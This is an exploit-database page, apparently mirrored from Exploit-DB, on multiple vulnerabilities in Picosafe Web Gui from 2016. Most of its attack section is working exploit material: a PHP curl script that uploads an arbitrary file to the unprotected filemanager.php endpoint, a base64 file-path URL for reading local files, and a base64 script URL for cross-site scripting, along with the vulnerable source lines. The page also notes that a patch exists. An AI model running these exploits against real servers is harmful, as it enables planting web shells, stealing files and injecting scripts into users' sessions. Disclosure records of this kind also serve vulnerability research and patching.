header-logo
Suggest Exploit
vendor:
Picosafe Web Gui
by:
Shahab Shamsi
7,5
CVSS
HIGH
Remote File Upload, Local File Disclosure, Cross-Site Scripting
434, 200, 79
CWE
Product Name: Picosafe Web Gui
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2016

Picosafe Web Gui – Multiple Vulnerabilities

Picosafe Web Gui is vulnerable to Remote File Upload, Local File Disclosure and Cross-Site Scripting. An attacker can exploit these vulnerabilities to upload malicious files, disclose sensitive information and execute malicious scripts.

Mitigation:

The vendor has released a patch to address these vulnerabilities. Users are advised to update to the latest version.
Source

Exploit-DB raw data:

[-] Title  : Picosafe Web Gui - Multiple Vulnerabilities 
[-] Author : Shahab Shamsi
[-] Vendor : https://github.com/embeddedprojects/picosafe_webgui
[-] Category : Webapps
[-] Date : 01.October.2016



Vulnerable page :
picosafe_webgui/webinterface/js/filemanager/filemanager.php




==========================
|  Remote File Upload :
==========================
Vulnerable Source (RFU) :
52: chmod($to, 0755); 
48: $to = realpath($curdir) . '/' . $name; 
40: function uploadfile($curdir)
46: $name = $_FILES['files']['name'][0];

Exploit :
<?php
$uploadfile="YourFileName";
$ch = curl_init("http://localhost:8282/picosafe_webgui/webinterface/js/filemanager/filemanager.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('file'=>"@$uploadfile"));
curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch);
curl_close($ch);
print "$result";
?>

Location :
http://localhost:8282/picosafe_webgui/webinterface/js/filemanager/FileName


==========================
|  Local File Disclosure :
==========================

Vulnerable Source (LFD) :
17: $file = base64_decode($_GET['file']);
18: DownloadFile($file);
111: readfile($file);

POC :
http://localhost:8282/picosafe_webgui/webinterface/js/filemanager/filemanager.php?file=base64code-Filename


==========================
|  Cross-Site Scripting :
==========================

Vulnerable Source (XSS) :
8: echo json_encode($data); 
7: $data = sortfiles($data); 
6: $data = listdirectory($directory); 
5: $directory = base64_decode($_GET['directory']); 

POC :
http://localhost:8282/picosafe_webgui/webinterface/js/filemanager/filemanager.php?directory=Base64-ScriptingCode

Navigation

Suggest Exploit

Services By CQR